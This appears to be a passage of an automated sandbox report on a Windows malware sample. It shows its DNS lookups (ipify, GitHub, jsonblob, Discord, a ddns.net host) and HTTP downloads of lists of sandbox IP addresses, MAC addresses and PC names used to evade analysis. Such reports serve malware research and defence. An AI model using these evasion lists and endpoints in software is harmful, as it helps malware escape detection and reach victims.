                                              Nov 4, 2024 16:24:48.220324039 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.220438004 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.220453978 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.220483065 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.220494032 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.220524073 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.220637083 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.220649958 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.345834017 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.353565931 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.353663921 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.367240906 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.367285967 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.367386103 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.367846012 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.367866039 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.234862089 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.235177994 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.235208988 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.235356092 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.235362053 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.236536980 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.236638069 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.237811089 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.237930059 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.238017082 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.238025904 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.285523891 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.372914076 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.372988939 CET44349709188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:49.373039961 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:49.382292986 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:49.382348061 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:49.382405996 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:49.382843971 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:49.382869005 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.206362963 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.206671953 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.206696987 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.206851959 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.206856966 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.207918882 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.207992077 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.209105015 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.209167957 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.209287882 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.209294081 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.256583929 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.554970980 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.555098057 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:50.555159092 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.558923960 CET49710443192.168.2.8162.159.137.232
                                              Nov 4, 2024 16:24:50.558947086 CET44349710162.159.137.232192.168.2.8
                                              Nov 4, 2024 16:24:51.169476032 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:51.169509888 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:51.169595957 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:51.170126915 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:51.170144081 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.315825939 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.316221952 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.316234112 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.316391945 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.316397905 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.317441940 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.317540884 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.318617105 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.318685055 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.318836927 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.318844080 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.366142035 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.899319887 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.900158882 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.900254011 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.900351048 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.900367022 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:52.900412083 CET62043443192.168.2.886.237.153.121
                                              Nov 4, 2024 16:24:52.900418997 CET4436204386.237.153.121192.168.2.8
                                              Nov 4, 2024 16:24:53.413834095 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:53.413865089 CET49709443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:53.414221048 CET49708443192.168.2.8188.114.97.3
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 4, 2024 16:24:40.981503010 CET5967153192.168.2.81.1.1.1
                                              Nov 4, 2024 16:24:40.989916086 CET53596711.1.1.1192.168.2.8
                                              Nov 4, 2024 16:24:43.929877996 CET6407053192.168.2.81.1.1.1
                                              Nov 4, 2024 16:24:43.937437057 CET53640701.1.1.1192.168.2.8
                                              Nov 4, 2024 16:24:47.341809034 CET5928953192.168.2.81.1.1.1
                                              Nov 4, 2024 16:24:47.376789093 CET53592891.1.1.1192.168.2.8
                                              Nov 4, 2024 16:24:49.374293089 CET5822253192.168.2.81.1.1.1
                                              Nov 4, 2024 16:24:49.381275892 CET53582221.1.1.1192.168.2.8
                                              Nov 4, 2024 16:24:50.560060978 CET6259253192.168.2.81.1.1.1
                                              Nov 4, 2024 16:24:50.567106009 CET53625921.1.1.1192.168.2.8
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 4, 2024 16:24:40.981503010 CET192.168.2.81.1.1.10xba11Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:43.929877996 CET192.168.2.81.1.1.10xa772Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:47.341809034 CET192.168.2.81.1.1.10x9a9cStandard query (0)jsonblob.comA (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:49.374293089 CET192.168.2.81.1.1.10xfb32Standard query (0)discord.comA (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:50.560060978 CET192.168.2.81.1.1.10xeb5fStandard query (0)goatherd.ddns.netA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 4, 2024 16:24:40.989916086 CET1.1.1.1192.168.2.80xba11No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:40.989916086 CET1.1.1.1192.168.2.80xba11No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:40.989916086 CET1.1.1.1192.168.2.80xba11No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:43.937437057 CET1.1.1.1192.168.2.80xa772No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:43.937437057 CET1.1.1.1192.168.2.80xa772No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:43.937437057 CET1.1.1.1192.168.2.80xa772No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:43.937437057 CET1.1.1.1192.168.2.80xa772No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:47.376789093 CET1.1.1.1192.168.2.80x9a9cNo error (0)jsonblob.com188.114.97.3A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:47.376789093 CET1.1.1.1192.168.2.80x9a9cNo error (0)jsonblob.com188.114.96.3A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:49.381275892 CET1.1.1.1192.168.2.80xfb32No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:49.381275892 CET1.1.1.1192.168.2.80xfb32No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:49.381275892 CET1.1.1.1192.168.2.80xfb32No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:49.381275892 CET1.1.1.1192.168.2.80xfb32No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Nov 4, 2024 16:24:49.381275892 CET1.1.1.1192.168.2.80xfb32No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                              • raw.githubusercontent.com
                                              • jsonblob.com
                                              • discord.com
                                              • goatherd.ddns.net
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.849705185.199.108.1334435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:44 UTC150OUTGET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
                                              Host: raw.githubusercontent.com
                                              User-Agent: Go-http-client/1.1
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:45 UTC902INHTTP/1.1 200 OK
                                              Connection: close
                                              Content-Length: 2853
                                              Cache-Control: max-age=300
                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                              Content-Type: text/plain; charset=utf-8
                                              ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
                                              Strict-Transport-Security: max-age=31536000
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: deny
                                              X-XSS-Protection: 1; mode=block
                                              X-GitHub-Request-Id: 4C71:1F99B7:175C8B7:19E2BA0:6728E73A
                                              Accept-Ranges: bytes
                                              Date: Mon, 04 Nov 2024 15:24:44 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-dfw-kdal2120054-DFW
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1730733885.951372,VS0,VE40
                                              Vary: Authorization,Accept-Encoding,Origin
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
                                              X-Fastly-Request-ID: aaf7eacc9017b97387f514fe261c266a5e82c170
                                              Expires: Mon, 04 Nov 2024 15:29:44 GMT
                                              Source-Age: 0
                                              2024-11-04 15:24:45 UTC1378INData Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31
                                              Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
                                              2024-11-04 15:24:45 UTC1378INData Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34
                                              Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
                                              2024-11-04 15:24:45 UTC97INData Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a
                                              Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.849706185.199.108.1334435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:45 UTC151OUTGET /6nz/virustotal-vm-blacklist/main/mac_list.txt HTTP/1.1
                                              Host: raw.githubusercontent.com
                                              User-Agent: Go-http-client/1.1
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:46 UTC902INHTTP/1.1 200 OK
                                              Connection: close
                                              Content-Length: 8370
                                              Cache-Control: max-age=300
                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                              Content-Type: text/plain; charset=utf-8
                                              ETag: "750542ec88f6a2bf2aade55342cec7f81464e781e17c580fafe11aff436f34dd"
                                              Strict-Transport-Security: max-age=31536000
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: deny
                                              X-XSS-Protection: 1; mode=block
                                              X-GitHub-Request-Id: 5ED6:212D4B:11E22CB:13E8912:6728E73A
                                              Accept-Ranges: bytes
                                              Date: Mon, 04 Nov 2024 15:24:46 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-dfw-kdal2120090-DFW
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1730733886.942299,VS0,VE83
                                              Vary: Authorization,Accept-Encoding,Origin
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
                                              X-Fastly-Request-ID: 3b8c3f87edbf99367265df3989db58a25c4d7bfe
                                              Expires: Mon, 04 Nov 2024 15:29:46 GMT
                                              Source-Age: 0
                                              2024-11-04 15:24:46 UTC1378INData Raw: 30 30 3a 30 33 3a 34 37 3a 31 61 3a 66 31 3a 66 31 0a 30 30 3a 30 33 3a 34 37 3a 32 30 3a 35 37 3a 37 61 0a 30 30 3a 30 33 3a 34 37 3a 35 64 3a 39 32 3a 63 35 0a 30 30 3a 30 33 3a 34 37 3a 36 33 3a 38 62 3a 64 65 0a 30 30 3a 30 33 3a 34 37 3a 38 64 3a 61 39 3a 35 64 0a 30 30 3a 30 63 3a 32 39 3a 30 35 3a 64 38 3a 36 65 0a 30 30 3a 30 63 3a 32 39 3a 32 63 3a 63 31 3a 32 31 0a 30 30 3a 30 63 3a 32 39 3a 35 32 3a 35 32 3a 35 30 0a 30 30 3a 30 64 3a 33 61 3a 64 32 3a 34 66 3a 31 66 0a 30 30 3a 30 65 3a 61 36 3a 31 37 3a 66 61 3a 66 38 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 31 32 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 31 64 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 61 34 0a 30 30 3a 31 35 3a 35 64 3a 30 30 3a 30 30 3a 62 33 0a 30 30 3a
                                              Data Ascii: 00:03:47:1a:f1:f100:03:47:20:57:7a00:03:47:5d:92:c500:03:47:63:8b:de00:03:47:8d:a9:5d00:0c:29:05:d8:6e00:0c:29:2c:c1:2100:0c:29:52:52:5000:0d:3a:d2:4f:1f00:0e:a6:17:fa:f800:15:5d:00:00:1200:15:5d:00:00:1d00:15:5d:00:00:a400:15:5d:00:00:b300:
                                              2024-11-04 15:24:46 UTC1378INData Raw: 30 3a 36 64 3a 38 36 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 37 34 3a 36 63 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 38 34 3a 38 38 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 38 38 3a 34 63 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 39 39 3a 62 36 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 39 64 3a 39 62 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 61 39 3a 35 34 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 61 61 3a 38 30 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 61 66 3a 37 35 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 62 63 3a 39 61 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 63 31 3a 66 64 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 63 38 3a 32 30 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 63 64 3a 61 38 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 64 30 3a 66 61 0a 30 30 3a 35 30 3a 35 36 3a 61 30 3a 64
                                              Data Ascii: 0:6d:8600:50:56:a0:74:6c00:50:56:a0:84:8800:50:56:a0:88:4c00:50:56:a0:99:b600:50:56:a0:9d:9b00:50:56:a0:a9:5400:50:56:a0:aa:8000:50:56:a0:af:7500:50:56:a0:bc:9a00:50:56:a0:c1:fd00:50:56:a0:c8:2000:50:56:a0:cd:a800:50:56:a0:d0:fa00:50:56:a0:d
                                              2024-11-04 15:24:46 UTC1378INData Raw: 3a 65 30 3a 34 63 3a 33 33 3a 66 38 3a 63 36 0a 30 30 3a 65 30 3a 34 63 3a 33 39 3a 37 36 3a 31 65 0a 30 30 3a 65 30 3a 34 63 3a 33 66 3a 30 62 3a 37 36 0a 30 30 3a 65 30 3a 34 63 3a 34 32 3a 63 37 3a 63 62 0a 30 30 3a 65 30 3a 34 63 3a 34 34 3a 37 36 3a 35 34 0a 30 30 3a 65 30 3a 34 63 3a 34 36 3a 30 34 3a 65 61 0a 30 30 3a 65 30 3a 34 63 3a 34 36 3a 63 66 3a 30 31 0a 30 30 3a 65 30 3a 34 63 3a 34 38 3a 65 64 3a 31 30 0a 30 30 3a 65 30 3a 34 63 3a 34 62 3a 34 61 3a 34 30 0a 30 30 3a 65 30 3a 34 63 3a 34 62 3a 65 66 3a 61 31 0a 30 30 3a 65 30 3a 34 63 3a 34 65 3a 39 66 3a 64 34 0a 30 30 3a 65 30 3a 34 63 3a 35 31 3a 32 66 3a 34 38 0a 30 30 3a 65 30 3a 34 63 3a 35 31 3a 65 35 3a 35 38 0a 30 30 3a 65 30 3a 34 63 3a 35 36 3a 34 32 3a 39 37 0a 30 30 3a 65 30
                                              Data Ascii: :e0:4c:33:f8:c600:e0:4c:39:76:1e00:e0:4c:3f:0b:7600:e0:4c:42:c7:cb00:e0:4c:44:76:5400:e0:4c:46:04:ea00:e0:4c:46:cf:0100:e0:4c:48:ed:1000:e0:4c:4b:4a:4000:e0:4c:4b:ef:a100:e0:4c:4e:9f:d400:e0:4c:51:2f:4800:e0:4c:51:e5:5800:e0:4c:56:42:9700:e0
                                              2024-11-04 15:24:46 UTC1378INData Raw: 33 30 3a 61 35 0a 30 30 3a 65 30 3a 34 63 3a 66 62 3a 34 35 3a 66 63 0a 30 32 3a 38 36 3a 33 39 3a 35 38 3a 31 66 3a 37 35 0a 30 36 3a 37 35 3a 39 31 3a 35 39 3a 33 65 3a 30 32 0a 30 36 3a 61 62 3a 66 38 3a 33 36 3a 34 66 3a 63 62 0a 30 36 3a 65 61 3a 31 35 3a 65 35 3a 31 36 3a 62 34 0a 30 38 3a 30 30 3a 32 37 3a 32 30 3a 34 63 3a 31 61 0a 30 38 3a 30 30 3a 32 37 3a 32 36 3a 31 62 3a 39 34 0a 30 38 3a 30 30 3a 32 37 3a 32 38 3a 36 37 3a 31 61 0a 30 38 3a 30 30 3a 32 37 3a 32 38 3a 65 33 3a 38 61 0a 30 38 3a 30 30 3a 32 37 3a 33 34 3a 37 61 3a 62 31 0a 30 38 3a 30 30 3a 32 37 3a 33 61 3a 32 38 3a 37 33 0a 30 38 3a 30 30 3a 32 37 3a 34 35 3a 31 33 3a 31 30 0a 30 38 3a 30 30 3a 32 37 3a 34 36 3a 61 33 3a 30 37 0a 30 38 3a 30 30 3a 32 37 3a 34 61 3a 63 63 3a
                                              Data Ascii: 30:a500:e0:4c:fb:45:fc02:86:39:58:1f:7506:75:91:59:3e:0206:ab:f8:36:4f:cb06:ea:15:e5:16:b408:00:27:20:4c:1a08:00:27:26:1b:9408:00:27:28:67:1a08:00:27:28:e3:8a08:00:27:34:7a:b108:00:27:3a:28:7308:00:27:45:13:1008:00:27:46:a3:0708:00:27:4a:cc:
                                              2024-11-04 15:24:46 UTC1378INData Raw: 63 3a 65 66 3a 34 34 3a 30 31 3a 35 30 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 35 34 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 35 37 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 61 38 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 31 3a 61 61 0a 33 63 3a 65 63 3a 65 66 3a 34 34 3a 30 32 3a 30 34 0a 33 63 3a 65 63 3a 65 66 3a 63 38 3a 33 39 3a 33 37 0a 33 65 3a 31 63 3a 61 31 3a 34 30 3a 62 37 3a 35 66 0a 33 65 3a 35 33 3a 38 31 3a 62 37 3a 30 31 3a 31 33 0a 33 65 3a 36 32 3a 61 61 3a 64 65 3a 64 37 3a 31 30 0a 33 65 3a 63 31 3a 66 64 3a 66 31 3a 62 66 3a 37 31 0a 34 32 3a 30 31 3a 30 61 3a 38 61 3a 30 30 3a 32 32 0a 34 32 3a 30 31 3a 30 61 3a 38 61 3a 30 30 3a 33 33 0a 34 32 3a 30 31 3a 30 61 3a 38 65 3a 30 30 3a 32 32 0a 34 32 3a 30 31 3a 30
                                              Data Ascii: c:ef:44:01:503c:ec:ef:44:01:543c:ec:ef:44:01:573c:ec:ef:44:01:a83c:ec:ef:44:01:aa3c:ec:ef:44:02:043c:ec:ef:c8:39:373e:1c:a1:40:b7:5f3e:53:81:b7:01:133e:62:aa:de:d7:103e:c1:fd:f1:bf:7142:01:0a:8a:00:2242:01:0a:8a:00:3342:01:0a:8e:00:2242:01:0
                                              2024-11-04 15:24:46 UTC1378INData Raw: 3a 30 36 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 30 38 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 38 65 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 39 38 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 63 30 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 63 63 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 64 38 0a 61 63 3a 31 66 3a 36 62 3a 64 30 3a 34 64 3a 65 34 0a 61 65 3a 34 63 3a 32 63 3a 39 66 3a 37 64 3a 62 62 0a 62 32 3a 39 66 3a 61 33 3a 39 65 3a 31 36 3a 39 65 0a 62 34 3a 61 39 3a 35 61 3a 62 31 3a 63 36 3a 66 64 0a 62 36 3a 63 34 3a 63 30 3a 30 39 3a 30 38 3a 61 65 0a 62 36 3a 65 64 3a 39 64 3a 32 37 3a 66 34 3a 66 61 0a 62 65 3a 30 30 3a 65 35 3a 63 35 3a 30 63 3a 65 35 0a 62 65 3a 32 62 3a 66 32 3a 63 38 3a 38 37 3a 36 65
                                              Data Ascii: :06ac:1f:6b:d0:4d:08ac:1f:6b:d0:4d:8eac:1f:6b:d0:4d:98ac:1f:6b:d0:4d:c0ac:1f:6b:d0:4d:ccac:1f:6b:d0:4d:d8ac:1f:6b:d0:4d:e4ae:4c:2c:9f:7d:bbb2:9f:a3:9e:16:9eb4:a9:5a:b1:c6:fdb6:c4:c0:09:08:aeb6:ed:9d:27:f4:fabe:00:e5:c5:0c:e5be:2b:f2:c8:87:6e
                                              2024-11-04 15:24:46 UTC102INData Raw: 33 63 3a 35 65 3a 66 37 3a 35 33 0a 66 36 3a 61 35 3a 34 31 3a 33 31 3a 62 32 3a 37 38 0a 66 61 3a 62 39 3a 34 34 3a 63 37 3a 31 63 3a 31 33 0a 66 61 3a 66 66 3a 64 34 3a 39 31 3a 33 30 3a 62 30 0a 66 65 3a 39 37 3a 37 38 3a 32 39 3a 62 65 3a 33 37 0a 66 66 3a 36 64 3a 33 36 3a 37 65 3a 35 30 3a 34 33 0a
                                              Data Ascii: 3c:5e:f7:53f6:a5:41:31:b2:78fa:b9:44:c7:1c:13fa:ff:d4:91:30:b0fe:97:78:29:be:37ff:6d:36:7e:50:43


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.849707185.199.108.1334435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:47 UTC155OUTGET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
                                              Host: raw.githubusercontent.com
                                              User-Agent: Go-http-client/1.1
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:47 UTC902INHTTP/1.1 200 OK
                                              Connection: close
                                              Content-Length: 3145
                                              Cache-Control: max-age=300
                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                              Content-Type: text/plain; charset=utf-8
                                              ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
                                              Strict-Transport-Security: max-age=31536000
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: deny
                                              X-XSS-Protection: 1; mode=block
                                              X-GitHub-Request-Id: 19F4:13DF04:16BEE89:1944F70:6728E73D
                                              Accept-Ranges: bytes
                                              Date: Mon, 04 Nov 2024 15:24:47 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-dfw-kdfw8210094-DFW
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1730733887.229948,VS0,VE41
                                              Vary: Authorization,Accept-Encoding,Origin
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
